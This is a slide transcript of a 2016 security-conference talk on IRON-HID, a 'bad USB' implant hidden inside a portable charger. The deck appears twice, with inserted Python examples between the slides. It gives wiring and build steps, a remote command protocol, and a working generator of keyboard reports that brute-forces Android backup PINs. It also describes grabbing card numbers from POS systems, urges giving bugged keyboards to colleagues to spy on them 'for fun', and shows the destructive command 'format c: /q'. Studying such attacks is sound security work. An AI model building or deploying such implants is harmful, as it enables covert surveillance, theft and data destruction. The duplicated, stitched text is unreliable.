IRON-HID:
Create your own bad USB
Seunghun Han
Who am I?
- Security researcher at NSR (National Security Research Institute of South Korea)
- Operating system and firmware developer
- Author of the book series titled “64-bit multi-core OS principles and structure, Vol.1 & 2”
- a.k.a. kkamagui (crow or raven in English) - @kkamagui1
Contents
- Background and Architecture of IRON-HID
- Hacking a Portable Charger
- Testing a Vulnerability of a Smartphone
- Testing a Vulnerability of a POS System and a PC
- Bonus
Background and Architecture of IRON-HID
IRON-HID Project?
IRON-HID = Human Interface Device for making your tools
Features
- Custom device + firmware + test agent program + Android smartphone program
- Various types of systems are exploitable
  - POS (Point-of-Sale), PC, Android, etc.
- Lightweight, embedded-hardware based
  - “Arduino” and “Teensy”
- Open-source project!
  - https://github.com/kkamagui/IRON-HID
Arduino vs Teensy

                  Arduino                           Teensy
Board             Arduino Mega                      Teensy++ 2.0
Size              Larger (palm size)                Smaller (paper-clip size)
Flash             256KB (ATmega16U2 + ATmega2560)   128KB (AT90USB1286)
I/O pins          60                                46

Arduino Sketch IDE is available for both!
Architecture (diagram)

- Targets: POS systems, PCs and smartphones. The custom device attaches to the target over USB, and the test agent (TA) program runs on the target.
- Proxy device: embedded, low-powered hardware carrying a wireless module (WiFi, Bluetooth, Cellular, etc.) and the custom device, which runs the IRON-HID firmware (USB functions and a CD-ROM image).
- Commander: the IRON-HID commander program on the security inspector's smartphone. It sends commands and events over the wireless link, receives the results of commands and receives the status of the proxy device.
- Custom device to target: installs the test agent program, sends keyboard events, and relays commands; the TA program executes shell commands, captures screens and gets files, and the results of commands (results of shell, screens, files) are returned to the Commander.
- IRON-HID components: the custom device (inside the proxy device), the IRON-HID firmware, the TA program and the Commander program.
IRON-HID Firmware
- Emulates a keyboard and a mass-storage device
  - It has one interrupt type endpoint for sending and logging keyboard events
  - It has two bulk type endpoints for installing the TA program
- Makes a custom communication channel
  - It has one control type endpoint for making a tunnel between the TA program and the Commander program
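The keyboard-plus-mass-storage profile the firmware presents is visible to any host in the device's USB configuration descriptor, which is where a defender can spot it. The following is an added example, not IRON-HID project code: a parser for a configuration descriptor that counts the endpoint types and flags the keyboard + storage pairing. The descriptor bytes are constructed here to match the slide's description (one interrupt endpoint, two bulk endpoints); the control tunnel is assumed to ride on the default control endpoint 0, which never appears in a configuration descriptor.

```python
"""Flag USB composite devices that pair a HID keyboard with a mass-storage
interface, the profile the IRON-HID firmware presents to the host.
Added example for this page, not IRON-HID project code.  The descriptor
bytes below are constructed to match the slide's description."""
import struct
from dataclasses import dataclass, field
from typing import List

# Standard descriptor types and class codes (USB 2.0 spec, chapter 9 / HID 1.11)
DT_CONFIG, DT_INTERFACE, DT_ENDPOINT = 0x02, 0x04, 0x05
CLASS_HID, CLASS_MSC = 0x03, 0x08
HID_SUBCLASS_BOOT, HID_PROTOCOL_KEYBOARD = 0x01, 0x01
XFER_NAMES = {0: "control", 1: "isochronous", 2: "bulk", 3: "interrupt"}


@dataclass
class Interface:
    number: int
    cls: int
    subclass: int
    protocol: int
    endpoints: List[dict] = field(default_factory=list)

    def is_boot_keyboard(self) -> bool:
        return (self.cls, self.subclass, self.protocol) == (
            CLASS_HID, HID_SUBCLASS_BOOT, HID_PROTOCOL_KEYBOARD)


def parse_config_descriptor(data: bytes) -> List[Interface]:
    """Walk the config/interface/endpoint descriptor chain.  Class-specific
    descriptors (e.g. the HID descriptor) are skipped by their bLength."""
    interfaces: List[Interface] = []
    off = 0
    while off + 2 <= len(data):
        blen, btype = data[off], data[off + 1]
        if blen < 2 or off + blen > len(data):
            raise ValueError(f"malformed descriptor at offset {off}")
        d = data[off:off + blen]
        if btype == DT_CONFIG:
            total = struct.unpack_from("<H", d, 2)[0]
            if total != len(data):
                raise ValueError(f"wTotalLength {total} != {len(data)} bytes supplied")
        elif btype == DT_INTERFACE:
            interfaces.append(Interface(number=d[2], cls=d[5], subclass=d[6], protocol=d[7]))
        elif btype == DT_ENDPOINT:
            if not interfaces:
                raise ValueError("endpoint descriptor before any interface")
            addr, attrs = d[2], d[3]
            interfaces[-1].endpoints.append({
                "address": addr & 0x0F,
                "direction": "IN" if addr & 0x80 else "OUT",
                "type": XFER_NAMES[attrs & 0x03],
            })
        off += blen
    return interfaces


def assess(interfaces: List[Interface]) -> dict:
    """Summarise the endpoint mix and flag the keyboard + storage pairing.
    The custom control tunnel rides on endpoint 0, which never appears in a
    configuration descriptor, so it is not counted here."""
    eps = [e for i in interfaces for e in i.endpoints]
    has_kbd = any(i.is_boot_keyboard() for i in interfaces)
    has_msc = any(i.cls == CLASS_MSC for i in interfaces)
    return {
        "interfaces": len(interfaces),
        "interrupt_endpoints": sum(e["type"] == "interrupt" for e in eps),
        "bulk_endpoints": sum(e["type"] == "bulk" for e in eps),
        "keyboard_plus_storage": has_kbd and has_msc,
    }


# Constructed descriptor modelled on the slide: HID boot keyboard with one
# interrupt IN endpoint, plus a mass-storage interface with two bulk endpoints.
CONSTRUCTED_IRONHID_LIKE = bytes([
    0x09, 0x02, 0x39, 0x00, 0x02, 0x01, 0x00, 0x80, 0x32,  # config, wTotalLength=57, 2 interfaces
    0x09, 0x04, 0x00, 0x00, 0x01, 0x03, 0x01, 0x01, 0x00,  # interface 0: HID, boot, keyboard
    0x09, 0x21, 0x11, 0x01, 0x00, 0x01, 0x22, 0x3F, 0x00,  # HID class descriptor (skipped)
    0x07, 0x05, 0x81, 0x03, 0x08, 0x00, 0x0A,              # EP1 IN, interrupt
    0x09, 0x04, 0x01, 0x00, 0x02, 0x08, 0x06, 0x50, 0x00,  # interface 1: mass storage (SCSI, bulk-only)
    0x07, 0x05, 0x82, 0x02, 0x40, 0x00, 0x00,              # EP2 IN, bulk
    0x07, 0x05, 0x03, 0x02, 0x40, 0x00, 0x00,              # EP3 OUT, bulk
])

# Constructed descriptor of an ordinary keyboard, for comparison.
CONSTRUCTED_PLAIN_KEYBOARD = bytes([
    0x09, 0x02, 0x22, 0x00, 0x01, 0x01, 0x00, 0x80, 0x32,  # config, wTotalLength=34, 1 interface
    0x09, 0x04, 0x00, 0x00, 0x01, 0x03, 0x01, 0x01, 0x00,  # interface 0: HID, boot, keyboard
    0x09, 0x21, 0x11, 0x01, 0x00, 0x01, 0x22, 0x3F, 0x00,  # HID class descriptor (skipped)
    0x07, 0x05, 0x81, 0x03, 0x08, 0x00, 0x0A,              # EP1 IN, interrupt
])

if __name__ == "__main__":
    for name, desc in (("iron-hid-like", CONSTRUCTED_IRONHID_LIKE),
                       ("plain keyboard", CONSTRUCTED_PLAIN_KEYBOARD)):
        print(name, assess(parse_config_descriptor(desc)))
```

On a Linux host the same bytes can be read from the device's sysfs `descriptors` file, so the check runs against real enumerations as well as the constructed samples.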
TA program and IRON-HID Commander
- The TA program processes requests from the Commander
  - Command execution, screen capture, file transfer
- The Commander is the pen-tester's interface
  - It has a control tab, a command tab and a key tab
  - The penetration tester uses each tab for testing security holes
Direction               | Format                | Description
Commander -> TA program | C;<command>;          | Commander requests that the TA program executes a command and sends the result to Commander
Commander -> TA program | G;<filename>;         | Commander requests that the TA program sends a file to Commander
Commander -> TA program | S;;                   | Commander requests that the TA program captures a screenshot and sends it to Commander
TA program -> Commander | F;;<64byte data>;     | TA program sends results to Commander
Commander -> Firmware   | <Magic string 1>      | Commander changes the firmware's mode to command transfer mode
Commander -> Firmware   | <Magic string 2>      | Commander changes the firmware's mode to keyboard event mode
Commander -> Firmware   | <Magic string 3>      | Commander requests that the firmware installs the TA program into the host
Firmware -> Commander   | M;;<keyboard event>;  | Firmware sends the user's keyboard inputs to Commander
Firmware -> Commander   | D;;<debug message>;   | Firmware sends debug messages to Commander
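A codec for the framed messages in the table above, written as an added example for this page and not the project's own implementation; it is the kind of decoder a monitor on the USB or Bluetooth side would need to recognise this traffic. It assumes that M and D payloads never contain ';', that F frames always carry exactly 64 data bytes (which may contain ';'), and it leaves out the magic strings because the slides do not give their values.

```python
"""Codec for the IRON-HID control-channel frames listed in the table above.
Added example for this page, not the project's own code.  Frame shape taken
from the table: <type>;<argument>;[<data>;]  where C/G carry an argument,
S carries nothing, F carries exactly 64 data bytes and M/D carry text.
Assumption: M/D payloads never contain ';'; F data may (it is length-framed)."""
from typing import Dict, List, Tuple

FRAME_CHUNK = 64  # F;;<64byte data>; as in the table

# type -> (sender, receiver), straight from the protocol table
DIRECTION: Dict[bytes, Tuple[str, str]] = {
    b"C": ("Commander", "TA program"),   # execute a command
    b"G": ("Commander", "TA program"),   # get a file
    b"S": ("Commander", "TA program"),   # capture a screenshot
    b"F": ("TA program", "Commander"),   # 64-byte result chunk
    b"M": ("Firmware", "Commander"),     # logged keyboard event
    b"D": ("Firmware", "Commander"),     # debug message
}
ARG_TYPES = {b"C", b"G"}     # <type>;<arg>;
TEXT_TYPES = {b"M", b"D"}    # <type>;;<text>;
MIN_FRAME = 3                # "S;;" is the shortest frame


def encode(mtype: bytes, arg: bytes = b"", data: bytes = b"") -> bytes:
    """Build one frame, refusing inputs that would break the ';' framing."""
    if mtype not in DIRECTION:
        raise ValueError(f"unknown message type {mtype!r}")
    if mtype in ARG_TYPES:
        if not arg or b";" in arg:
            raise ValueError("argument must be non-empty and contain no ';'")
        return mtype + b";" + arg + b";"
    if mtype == b"F":
        if len(data) != FRAME_CHUNK:
            raise ValueError(f"F frames carry exactly {FRAME_CHUNK} bytes")
        return mtype + b";;" + data + b";"
    if mtype in TEXT_TYPES:
        if b";" in data:
            raise ValueError("text payload must not contain ';'")
        return mtype + b";;" + data + b";"
    return mtype + b";;"  # S;; carries neither argument nor data


def decode_stream(buf: bytes) -> Tuple[List[dict], bytes]:
    """Split a byte stream into complete frames.  Returns the decoded frames
    and the unconsumed tail (an incomplete trailing frame) so the caller can
    append the next read and call again.  Malformed input raises instead of
    being resynchronised silently."""
    frames: List[dict] = []
    while len(buf) >= MIN_FRAME:
        mtype = buf[:1]
        if mtype not in DIRECTION or buf[1:2] != b";":
            raise ValueError(f"bad frame header {buf[:2]!r}")
        if mtype == b"F":
            need = 3 + FRAME_CHUNK + 1
            if len(buf) < need:
                break  # wait for the rest of the fixed-size chunk
            if buf[2:3] != b";" or buf[need - 1:need] != b";":
                raise ValueError("malformed F frame")
            arg, data, consumed = b"", buf[3:3 + FRAME_CHUNK], need
        else:
            end_arg = buf.find(b";", 2)
            if end_arg < 0:
                break  # argument not yet complete
            arg = buf[2:end_arg]
            if mtype in ARG_TYPES and not arg:
                raise ValueError(f"{mtype!r} frame without an argument")
            if mtype not in ARG_TYPES and arg:
                raise ValueError(f"{mtype!r} frame must have an empty argument field")
            if mtype in TEXT_TYPES:
                end_data = buf.find(b";", end_arg + 1)
                if end_data < 0:
                    break  # payload not yet complete
                data, consumed = buf[end_arg + 1:end_data], end_data + 1
            else:
                data, consumed = b"", end_arg + 1
        sender, receiver = DIRECTION[mtype]
        frames.append({"type": mtype.decode(), "arg": arg, "data": data,
                       "from": sender, "to": receiver})
        buf = buf[consumed:]
    return frames, buf


if __name__ == "__main__":
    # Constructed sample stream: three Commander requests, one result chunk,
    # one logged key event and a partial debug frame left in the tail.
    sample = (encode(b"C", b"dir") + encode(b"S")
              + encode(b"F", data=bytes(range(FRAME_CHUNK)))
              + encode(b"M", data=b"KEY_A") + b"D;;par")
    decoded, tail = decode_stream(sample)
    for f in decoded:
        print(f"{f['from']} -> {f['to']}: {f['type']} arg={f['arg']!r} {len(f['data'])} bytes")
    print("unconsumed tail:", tail)
```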
We are ready to launch!
Choose a target to attach it to
We want a portable charger
- We use the smartphone everywhere!!
- We spend much time with the smartphone
- But it doesn't have enough battery
- So you should bring your charger or …
So many portable chargers…
So many battery rental services…
Hey, do you totally trust your portable charger?
PowerShock!!
- It is a portable charger, but not a normal one
- It has IRON-HID inside it
- It can test Android smartphones
- It can test POS (Point-Of-Sale) systems
- It can test your PC
It is a perfect weapon for penetration testers
Hacking a Portable Charger
Tools you need
Inside of the portable charger
- It has a very simple architecture
- A charger module and battery cells
- High capacity model -> more battery cells!
Cutting off battery cells
- Make some space for IRON-HID
- Battery cells are connected in parallel
- Cut off the cell connector carefully
Pin layouts of the charger module
- USB connector for input (recharging), micro type, pins No.1 to No.5: VCC, Data-, Data+, ID, GND
- USB connector for output (smartphone), A type, pins No.1 to No.4: VCC, Data-, Data+, GND
- USB datasheet: micro type, A type and mini type connectors, with the VCC and GND pins marked on each
Pin layouts of the IRON-HID
- Bluetooth serial module (RN-42 Silver) pins: VCC, GND, TX, RX, CTS, RTS
- Teensy pins used: D2 (RX), D3 (TX), GND, 5V OUT
- Wiring: Bluetooth TX -> Teensy D2 (RX); Bluetooth RX -> Teensy D3 (TX); Bluetooth GND -> Teensy GND; Bluetooth VCC -> Teensy 5V OUT
- Teensy USB side: VCC, Data-, Data+, GND, ID
You got the power!!
* Rebirth of the Portable Charger *
USB OTG (On-The-Go)
* The final piece of the puzzle *
- It activates the USB host function of smartphones
- You can connect various types of USB peripherals such as a keyboard, a mass-storage device (USB drive) or a mouse
(Image: smartphone, PowerShock and cables) … ?! …
OH… THIS IS NOT WHAT I WANT
Making a custom OTG cable
Connect the ID pin with the GND pin
Testing a Vulnerability of the Smartphone
Well-known Smartphone Vulnerability

Do you use a pattern lock?
  No  -> You are safe (maybe…)
  Yes -> Do you set a backup PIN?
           No  -> You are safe (maybe…)
           Yes -> Can you type backup PINs unlimitedly?
                    No  -> You are safe (maybe…)
                    Yes -> You are in danger
Testing the vulnerability
- Connect PowerShock to a smartphone with the custom OTG cable and fire!!
- It is really hard to test the vulnerability with your hands
- The PowerShock tests it instead of you
- It sends PINs quickly and automatically!!
If someone asks you to charge a phone, charge it with PowerShock!!
Demo
(Let’s test the Android)
Testing a Vulnerability of the POS System and the PC
Inside of the POS Systems
Parallel port, serial port, USB + LAN, PS/2
Many POS systems are PC-based!! (POS == PC)
What if the PowerShock plugs into the POS?
If the POS system has a vulnerability, you can grab card numbers!!
(Diagram: the PowerShock is connected to the POS system over USB as if to recharge; the captured card data is shown as Card Num: XXXX-XXXX, Date: XX/XX)
Demo
(Let’s test the POS system)
Bonus
KeyboardShock
Attach IRON-HID onto USB keyboards and give them to your colleagues
Find the key matrix with a multimeter
(Image: an example of a keyboard matrix)
ReaderShock
Attach IRON-HID onto card readers and give them to your colleagues too
Then…
You will be the big brother, for fun!!
Logging and sending keys
Receiving files and capturing
screenshots
Executing commands
C:> notepad no-mercy.txt
C:> format c: /q
Resources
- http://www.fourwalledcubicle.com
- http://cdemu.blogspot.com
- http://www.usb.org
- https://www.arduino.cc
- https://www.pjrc.com/teensy
I will be waiting for your email
@kkamagui1, hanseunghun@nsr.re.kr
Thank you !

HITBSecConf 2016 - Create Your Own Bad USB (slide transcript)

  • 1. IRON-HID: Create your own bad USB
    Seunghun Han
  • 2. Who am I?
    - Security researcher at NSR (National Security Research Institute of South Korea)
    - Operating system and firmware developer
    - Author of the book series titled “64-bit multi-core OS principles and structure, Vol.1 & 2”
    - a.k.a. kkamagui (crow or raven in English) - @kkamagui1
  • 3. Contents
    - Background and Architecture of IRON-HID
    - Hacking a Portable Charger
    - Testing a Vulnerability of a Smartphone
    - Testing a Vulnerability of a POS System and a PC
    - Bonus
  • 4. (agenda slide: start of the Background and Architecture of IRON-HID section)
  • 5. IRON-HID Project?
    IRON-HID = Human Interface Device for making your tools
  • 6. Features
    - Custom device + firmware + test agent program + Android smartphone program
    - Can test various types of systems: POS (Point-of-Sale), PC, Android, etc.
    - Based on lightweight embedded hardware: “Arduino” and “Teensy”
    - Open-source project! https://github.com/kkamagui/IRON-HID
  • 7. Arduino vs Teensy
                  Arduino                            Teensy
    Board         Arduino Mega                       Teensy++ 2.0
    Size          Larger (palm size)                 Smaller (paper-clip size)
    Flash         256KB (ATmega16U2 + ATmega2560)    128KB (AT90USB1286)
    I/O pins      60                                 46
    The Arduino Sketch IDE is available for both!
  • 9. Architecture of IRON-HID (component diagram; the IRON-HID components are marked)
    Commander: the IRON-HID commander program on the security inspector's smartphone
      - sends commands and events to the proxy device and installs the test agent (TA) program on the target
      - receives the status of the proxy device and the results of commands (results of shell, screens, files)
    Proxy device: a custom device built on embedded, low-powered hardware with a wireless module (WiFi, Bluetooth, Cellular, etc.), running the IRON-HID firmware (USB functions and a CD-ROM image); it talks to the Commander wirelessly, attaches to the target over USB and sends keyboard events to it
    Target: POS systems, PCs, smartphones, running the TA program, which executes shell commands, captures screens and gets files
  • 10. IRON-HID Firmware
    - Emulates a keyboard and a mass-storage device
      - one interrupt-type endpoint for sending and logging keyboard events
      - two bulk-type endpoints for installing the TA program
    - Makes a custom communication channel
      - one control-type endpoint for making a tunnel between the TA program and the Commander program
  • 11. TA program and IRON-HID Commander
    - The TA program processes requests of the Commander: command execution, screen capture, file transfer
    - The Commander is the interface for pen-testers: it has a control tab, a command tab and a key tab
    - The penetration tester uses each tab for testing security holes
  • 12. Protocol between the components
    Direction                Format                 Description
    Commander → TA program   C;<command>;           Commander requests that the TA program execute a command and send the result to the Commander
    Commander → TA program   G;<filename>;          Commander requests that the TA program send a file to the Commander
    Commander → TA program   S;;                    Commander requests that the TA program capture a screenshot and send it to the Commander
    TA program → Commander   F;;<64byte data>;      TA program sends results to the Commander
    Commander → Firmware     <Magic string 1>       Commander changes the firmware's mode to command transfer mode
    Commander → Firmware     <Magic string 2>       Commander changes the firmware's mode to keyboard event mode
    Commander → Firmware     <Magic string 3>       Commander requests that the firmware install the TA program into the host
    Firmware → Commander     M;;<keyboard event>;   Firmware sends the user's keyboard inputs to the Commander
    Firmware → Commander     D;;<debug message>;    Firmware sends debug messages to the Commander
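The message formats in the table above, encoded and decoded in Python as an added worked example. This is not the IRON-HID project's own code (that is on GitHub); only the formats come from the slide. The function names, the MAX_BODY cap, the zero padding of a short final F chunk and the sample traffic (constructed) are assumptions of this example. The point it makes: `F;;<64byte data>;` is length framed, so the receiver takes 64 bytes by count, while the other messages are delimiter framed, so a ';' in a command or filename cannot be expressed and a parser that splits the whole stream on ';' breaks on binary screenshot or file data.

```python
"""Framing for the Commander <-> TA program / firmware messages (added example).

Message formats follow the protocol table above. Names, the MAX_BODY cap, the
zero padding in pack_result() and the sample traffic are assumptions of this
example, not part of the IRON-HID project.
"""
from dataclasses import dataclass
from typing import List, Tuple

RESULT_CHUNK = 64                # F;;<64byte data>; carries exactly 64 bytes
ARG_KINDS = {b"C", b"G", b"S"}   # Commander -> TA program:          X;<arg>;
DATA_KINDS = {b"F", b"M", b"D"}  # TA program/firmware -> Commander: X;;<data>;
MAX_BODY = 1024                  # assumed cap so an unterminated body cannot grow forever


@dataclass
class Message:
    kind: bytes   # one of C G S F M D
    body: bytes   # argument, result chunk, keyboard event or debug text


def encode(kind: bytes, body: bytes = b"") -> bytes:
    """Build one message. ';' is the delimiter, so delimiter-framed bodies may not contain it."""
    if kind == b"F":
        if len(body) != RESULT_CHUNK:
            raise ValueError("F chunk must be exactly %d bytes" % RESULT_CHUNK)
        return b"F;;" + body + b";"              # length framed: ';' inside is data
    if kind in ARG_KINDS:
        sep = b";"
    elif kind in DATA_KINDS:
        sep = b";;"
    else:
        raise ValueError("unknown message kind %r" % kind)
    if b";" in body:
        raise ValueError("';' cannot appear in a delimiter-framed body")
    return kind + sep + body + b";"


def decode(buf: bytes) -> Tuple[List[Message], bytes]:
    """Parse every complete message in buf; return them and the unparsed tail
    (a partial message that still needs bytes from the channel)."""
    out: List[Message] = []
    pos, n = 0, len(buf)
    while pos < n:
        kind = buf[pos:pos + 1]
        if kind in ARG_KINDS:
            hdr, fixed = 2, False
        elif kind == b"F":
            hdr, fixed = 3, True
        elif kind in DATA_KINDS:
            hdr, fixed = 3, False
        else:
            raise ValueError("unknown message kind %r at offset %d" % (kind, pos))
        if n - pos < hdr:
            break                                 # header not complete yet
        if buf[pos + 1:pos + hdr] != b";" * (hdr - 1):
            raise ValueError("malformed header at offset %d" % pos)
        start = pos + hdr
        if fixed:
            end = start + RESULT_CHUNK            # take 64 bytes by count, never by delimiter
            if n < end + 1:
                break
            if buf[end:end + 1] != b";":
                raise ValueError("F chunk at offset %d is not terminated" % pos)
        else:
            end = buf.find(b";", start)           # delimiter framed
            if end < 0:
                if n - start > MAX_BODY:
                    raise ValueError("unterminated body exceeds MAX_BODY")
                break
            if end - start > MAX_BODY:
                raise ValueError("body exceeds MAX_BODY")
        out.append(Message(kind, buf[start:end]))
        pos = end + 1
    return out, buf[pos:]


def pack_result(data: bytes) -> bytes:
    """Split a TA program result (shell output, screenshot, file) into F chunks.
    Assumption: a short final chunk is zero padded; the deck does not say."""
    frames = []
    for i in range(0, len(data), RESULT_CHUNK):
        frames.append(encode(b"F", data[i:i + RESULT_CHUNK].ljust(RESULT_CHUNK, b"\0")))
    return b"".join(frames)


if __name__ == "__main__":
    # Constructed sample traffic: two Commander requests, one result chunk made
    # entirely of ';' bytes, and a keyboard event still missing its terminator.
    stream = (encode(b"C", b"whoami") + encode(b"S") +
              encode(b"F", b";" * RESULT_CHUNK) + b"M;;KEY_A")
    msgs, tail = decode(stream)
    print([m.kind for m in msgs], tail)           # [b'C', b'S', b'F'] b'M;;KEY_A'
```

Two checks a practitioner would want follow from the table itself. None of the formats carries an authentication or integrity field, so whoever can reach the proxy device's wireless channel can send a `C;<command>;` line, and a TA program that executes it is a remote shell bound to that channel. And the MAX_BODY cap matters because a peer that never sends the closing ';' would otherwise make the receiver buffer without bound.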
  • 13. We are ready to launch! Choose a target to attach it to
  • 14. We want a portable charger
    - We use the smartphone everywhere!!
    - We spend much time with the smartphone
    - But it doesn't have enough battery
    - So you should bring your charger or …
  • 15. So many portable chargers…
  • 16. So many battery rental services…
  • 17. Hey, do you totally trust your portable charger?
  • 18. PowerShock!!
    - It is a portable charger, but not a normal one
    - It has IRON-HID inside it
    - It can test Android smartphones
    - It can test POS (Point-Of-Sale) systems
    - It can test your PC
    It is a perfect weapon for penetration testers
  • 19. (agenda slide: start of the Hacking a Portable Charger section)
  • 21. Inside of the portable charger
    - It has a very simple architecture: a charger module and battery cells
    - High-capacity model: more battery cells!
  • 22. Cutting off battery cells
    - Make some space for IRON-HIDs
    - Battery cells are connected in parallel
    - Cut off the cell connector carefully
  • 23. Pin layouts of the charger module
    USB connector for input (recharging), pins No.1 to No.5: VCC, Data-, Data+, GND, ID
    USB connector for output (smartphone), pins No.1 to No.4: VCC, Data-, Data+, GND
  • 24. USB Datasheet (figure: pinouts of the Micro, Type A and Mini connectors, with VCC and GND marked on each)
  • 25. Pin layouts of the IRON-HID
    Bluetooth serial module (RN-42 Silver) pins: VCC, GND, TX, RX, CTS, RTS
    Wiring between the Teensy and the Bluetooth module (serial TX and RX are crossed):
      Teensy D2 (RX)  ↔ Bluetooth TX
      Teensy D3 (TX)  ↔ Bluetooth RX
      Teensy GND      ↔ Bluetooth GND
      Teensy 5V OUT   ↔ Bluetooth VCC
    Teensy USB side: VCC, Data-, Data+, GND, ID
  • 26. You got the power!! * Rebirth of the Portable Charger *
  • 27. USB OTG (On-The-Go) * The final piece of the puzzle *
    - It activates the USB host function of smartphones
    - You can connect various types of USB peripherals such as a keyboard, a mass-storage device (USB drive) or a mouse
  • 28. (figure: Smartphone, cables, PowerShock) … ?! …
  • 29. (figure: Smartphone, cables, PowerShock) … ?! … OH… THIS IS NOT WHAT I WANT
  • 30. Making a custom OTG cable: connect the ID pin to the GND pin, so the phone takes the USB host role
  • 31. (agenda slide: start of the Testing a Vulnerability of the Smartphone section)
  • 32. Well-known smartphone vulnerability (decision tree)
    Do you use a pattern lock?
      No  → You are safe (maybe…)
      Yes → Do you set a backup PIN?
        No  → You are safe (maybe…)
        Yes → Can you type backup PINs unlimitedly?
          No  → You are safe (maybe…)
          Yes → You are in danger
  • 33. Testing the vulnerability
    - Connect the PowerShock to a smartphone with the custom OTG cable and fire!!
    - It is really hard to test the vulnerability by hand
    - The PowerShock tests it instead of you: it sends PINs quickly and automatically!!
    If someone asks you to charge a phone, charge it with PowerShock!!
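How the automated PIN entry of slide 33 looks at the USB level, as an added example in Python; it is not the IRON-HID firmware's code (the deck does not show it) and models the reports the firmware's keyboard interrupt endpoint would send. The facts used are the 8-byte boot-protocol keyboard report (modifier, reserved, six key usage IDs) and the usage IDs of the digit keys and Enter from the USB HID Usage Tables; the function names, the candidate order (0000 upward) and the host-side decoder are assumptions of this example. The edge case it shows: every key needs its own release report, because a host only counts a keystroke when a usage ID appears that was not in the previous report, so a PIN with a repeated digit typed as back-to-back down-reports registers as one held key.

```python
"""USB HID boot-protocol keyboard reports for automated backup-PIN entry (added example).

Not the IRON-HID firmware's code. Facts used: the 8-byte boot-protocol
keyboard report and the usage IDs of the digit keys and Enter from the USB
HID Usage Tables. Function names and the candidate order are assumptions.
"""
from typing import Iterable, Iterator, List

KEY_ENTER = 0x28
DIGIT_USAGE = {"1": 0x1E, "2": 0x1F, "3": 0x20, "4": 0x21, "5": 0x22,
               "6": 0x23, "7": 0x24, "8": 0x25, "9": 0x26, "0": 0x27}
USAGE_CHAR = {u: c for c, u in DIGIT_USAGE.items()}
USAGE_CHAR[KEY_ENTER] = "\n"
RELEASE = bytes(8)   # all keys up


def key_report(usage: int, modifier: int = 0) -> bytes:
    """One report with a single key down: modifier, reserved, key[0..5]."""
    return bytes([modifier, 0, usage, 0, 0, 0, 0, 0])


def pin_attempt(pin: str) -> List[bytes]:
    """Reports for typing one PIN and pressing Enter.

    Each key gets its own release report: the host only sees a new keystroke
    when a usage appears that was not in the previous report, so '11' sent as
    two identical down-reports would count as a single held key."""
    reports: List[bytes] = []
    for ch in pin:
        if ch not in DIGIT_USAGE:
            raise ValueError("PIN must be numeric: %r" % pin)
        reports += [key_report(DIGIT_USAGE[ch]), RELEASE]
    reports += [key_report(KEY_ENTER), RELEASE]
    return reports


def candidate_pins(length: int = 4) -> Iterator[str]:
    """Every numeric PIN of the given length, lowest first (assumed order)."""
    for n in range(10 ** length):
        yield f"{n:0{length}d}"


def report_stream(pins: Iterable[str]) -> Iterator[bytes]:
    """What the firmware's interrupt endpoint would send, one report at a time."""
    for pin in pins:
        yield from pin_attempt(pin)


def host_view(reports: Iterable[bytes]) -> str:
    """Host-side decoding: a key counts as pressed when it is newly present
    compared with the previous report, as a HID boot-keyboard driver does."""
    typed: List[str] = []
    prev: set = set()
    for rep in reports:
        if len(rep) != 8:
            raise ValueError("a boot keyboard report is 8 bytes")
        keys = {u for u in rep[2:8] if u}
        for u in sorted(keys - prev):
            typed.append(USAGE_CHAR.get(u, "?"))
        prev = keys
    return "".join(typed)


if __name__ == "__main__":
    print(repr(host_view(pin_attempt("1111"))))           # '1111\n'
    print(len(list(report_stream(candidate_pins(4)))))     # 100000
```

The stream only gets anywhere in the case the decision tree marks as dangerous, where backup PINs can be typed without limit. A phone that enforces a delay or a lockout after a few wrong PINs just has it triggered, so pacing the attempts to what the target tolerates is the practical concern, and the deck gives no numbers for that.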
  • 35. (agenda slide: start of the Testing a Vulnerability of the POS System and the PC section)
  • 36. Inside of the POS systems
    Ports on the board: parallel port, USB + LAN, serial port, PS/2
    Many POS systems are PC-based!! (POS == PC)
  • 37. If the PowerShock plugs into the POS?
    POS System ←USB (recharge)→ PowerShock
    If the POS system has a vulnerability, you can grab card numbers!! (Card Num: XXXX-XXXX, Date: XX/XX)
  • 38. Demo (Let's test the POS system)
  • 39. (agenda slide: start of the Bonus section)
  • 40. KeyboardShock: attach IRON-HID onto USB keyboards and give them to your colleagues
  • 41. Find the key matrix with a multimeter
  • 42. The example of the keyboard matrix (figure)
  • 43. ReaderShock: attach IRON-HID onto card readers and give them to your colleagues, too
  • 44. Then… you will be the big brother, for fun!!
    - Logging and sending keys
    - Receiving files and capturing screenshots
    - Executing commands: C:> notepad no-mercy.txt, C:> format c: /q
  • 45. Resources
    - http://www.fourwalledcubicle.com
    - http://cdemu.blogspot.com
    - http://www.usb.org
    - https://www.arduino.cc
    - https://www.pjrc.com/teensy
  • 46. I will be waiting for your email: @kkamagui1, hanseunghun@nsr.re.kr. Thank you!